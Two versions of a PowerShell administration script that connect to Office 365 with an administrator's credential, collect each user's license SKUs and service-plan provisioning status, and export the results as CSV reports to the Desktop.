Write-Progress -Activity "Connecting Office 365" -Id 1
Import-Module MSOnline; Connect-MsolService -Credential $cred

#Start of Script
Write-Progress -Activity "Retrieving User Information" -Id 1
$AllUsers = Get-MsolUser -All | select DisplayName, UserPrincipalName, Licenses

#One column per SKU (license type) found in the tenant
$AccountSkuId = ($AllUsers.Licenses.AccountSkuId | group).Name

$paras = @(); $paras += "DisplayName"; $paras += "UserPrincipalName"; $paras += "Domain"; $paras += $AccountSkuId

$List = @(); $i = 1; $AllCount = ($AllUsers).Count

$DesktopPath = $PathOfOutputFiles

#Start of User Loop
Write-Progress -Activity "Working on Retrieved Data" -Id 1

$AllUsers | foreach {
    $cUser = $_
    $cList = "" | select $paras
    $cList.DisplayName = $cUser.DisplayName
    $cList.UserPrincipalName = $cUser.UserPrincipalName
    #Domain is everything after the "@" in the UPN
    $cList.Domain = (($cUser.UserPrincipalName).split("@")[1])
    #Mark each SKU assigned to this user (unlicensed users pipe a $null, hence the if)
    $cUser.Licenses.AccountSkuId | foreach {
        if ($_) { $cList.$_ = "Yes" }
    }
    $List += $cList; $i += 1; if ($i -le $AllCount) { Write-Progress -Activity "Analysing per-User Licensing Information" -PercentComplete (($i/$AllCount)*100) -CurrentOperation "$i of $AllCount" -ParentId 1 }
    Clear-Variable cUser;
}
#End of User Loop

$List | Export-Csv ($DesktopPath + "\" + $NameOfOutputFile_LicenseDetails) -NoTypeInformation
$Error | Export-Csv ($DesktopPath + "\" + $NameOfOutputFile_Errors) -NoTypeInformation

$TimeFlag2 = (Get-Date); Write-Host "Time Taken: " ($TimeFlag2 - $TimeFlag1) " for " $AllCount " users."

$host.EnterNestedPrompt();#$host.ExitNestedPrompt()

#End of Script



Script Version 2

#Editables
$NameOfOutputFile_LicenseDetails = "LicenseStats.csv"
$NameOfOutputFile_ServiceStatus = "ServiceStatus.csv"
$NameOfOutputFile_Errors = "Errors.csv"
$PathOfOutputFiles = [Environment]::GetFolderPath("Desktop")

#ErrorsRefreshed
$Error.Clear()

#Prompts for Office 365 Administrator Credential (reused if $cred already exists in the session)
if (!$cred) { $cred = Get-Credential }

$TimeFlag1 = (Get-Date) #First Time Flag

#Initiates Remote PowerShell connection
Write-Progress -Activity "Connecting Office 365" -Id 1
Import-Module MSOnline; Connect-MsolService -Credential $cred

#Start of Script
Write-Progress -Activity "Retrieving User Information" -Id 1
$AllUsers = Get-MsolUser -All | select DisplayName, UserPrincipalName, Licenses

#ColumnsStart
#License report: one column per distinct AccountSkuId
$AccountSkuId = ($AllUsers.Licenses.AccountSkuId | group).Name
$paras = @(); $paras += "DisplayName"; $paras += "UserPrincipalName"; $paras += "Domain"; $paras += $AccountSkuId

#Service status report: one column per distinct service plan name
$ServicePlans = ($AllUsers.Licenses.ServiceStatus.ServicePlan.ServiceName | group).Name
$paras2 = @(); $paras2 += "DisplayName"; $paras2 += "UserPrincipalName"; $paras2 += "Domain"; $paras2 += $ServicePlans
#ColumnsEnd

$List = @(); $List2 = @(); $i = 1; $AllCount = ($AllUsers).Count
$DesktopPath = $PathOfOutputFiles

#Start of User Loop
Write-Progress -Activity "Working on Retrieved Data" -Id 1

$AllUsers | foreach {
    $cUser = $_
    #Empty row objects, one per report
    $cList = "" | select $paras; $cList2 = "" | select $paras2
    $cList.DisplayName = $cUser.DisplayName; $cList2.DisplayName = $cUser.DisplayName
    $cList.UserPrincipalName = $cUser.UserPrincipalName; $cList2.UserPrincipalName = $cUser.UserPrincipalName
    $cList.Domain = (($cUser.UserPrincipalName).split("@")[1]); $cList2.Domain = $cList.Domain

    #Mark every SKU assigned to this user with "Yes"
    $cUser.Licenses.AccountSkuId | foreach {
        if ($_) { $cList.$_ = "Yes" }
    }

    #Record the provisioning status of each service plan under the user's licenses
    $cUser.Licenses.ServiceStatus | foreach {
        if ($_) { $cList2name = $_.ServicePlan.ServiceName; $cList2stat = $_.ProvisioningStatus; $cList2.$cList2name = $cList2stat }
    }

    $List += $cList; $List2 += $cList2

    $i += 1
    if ($i -le $AllCount) { Write-Progress -Activity "Analysing per-User Licensing Information" -PercentComplete (($i/$AllCount)*100) -CurrentOperation "$i of $AllCount" -ParentId 1 }

    Clear-Variable cUser
}
#End of User Loop

#Join-Path inserts the directory separator between the folder and the file name
$List | Export-Csv (Join-Path $DesktopPath $NameOfOutputFile_LicenseDetails) -NoTypeInformation
$List2 | Export-Csv (Join-Path $DesktopPath $NameOfOutputFile_ServiceStatus) -NoTypeInformation
$Error | Export-Csv (Join-Path $DesktopPath $NameOfOutputFile_Errors) -NoTypeInformation

$TimeFlag2 = (Get-Date); Write-Host "Time Taken: " ($TimeFlag2 - $TimeFlag1) " for " $AllCount " users."

#Keeps the window open when run via "Run with PowerShell"; type exit to leave (or call $host.ExitNestedPrompt())
$host.EnterNestedPrompt()

#End of Script
